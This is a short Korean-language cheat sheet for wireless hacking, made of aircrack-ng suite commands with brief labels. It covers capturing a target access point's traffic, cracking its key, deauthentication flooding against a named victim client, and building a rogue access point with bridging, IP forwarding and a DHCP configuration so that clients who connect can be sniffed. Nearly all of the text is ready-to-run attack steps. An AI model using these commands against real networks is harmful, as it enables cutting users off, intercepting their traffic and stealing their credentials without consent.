무선 해킹 본문
http://dlrudwo.tistory.com/entry/Rogue-AP
모니터 모드
airmon-ng start [NIC]
airmon-ng stop [NIC]
패킷 덤프
airodump-ng [NIC]
airodump-ng --bssid [AP_MAC] -w [OUTPUT] -c [channel] [NIC]
패킷 크랙
aircrack-ng -b [AP_MAC] [PCAP]
airdecap-ng -w [ASCIIPW] [PCAP]
디어센패킷
aireplay-ng -0 0 -a [AP_MAC] -c [VIMTIM_MAC] [NIC]
mdk3 [NIC] d c [channel]
-b
가상 AP 생성
airbase-ng —essid "rogueAP" -c 3 wlan0mon
eth0, at0 을 묶을 브릿지 추가e
brctl addbr bridgeCore
eth0, at0을 bridgeCore 에 묶음
brctl addif bridgeCore eth0
brctl addif bridgeCore at0
eth0, at0 루프백으로 아이피 설정
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
bridgeCore 인터페이스 업
ifconfig bridgeCore up
bridgeCore 에 ip 할당
dhclient bridgeCore
패킷 포워딩 설정
echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/dhcp/dhcpd.conf 파일안에 넣을 것
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8, 8.8.4.4;
}
로그 AP로 접속들어오는 호스트들을 와이어패킷으로
스캔하여 정보 획득
Aircrack-ng
Beacon과 AP
Airbase-ng, 가상의 AP 구축
Ssid 연결조건
무선연결 끊음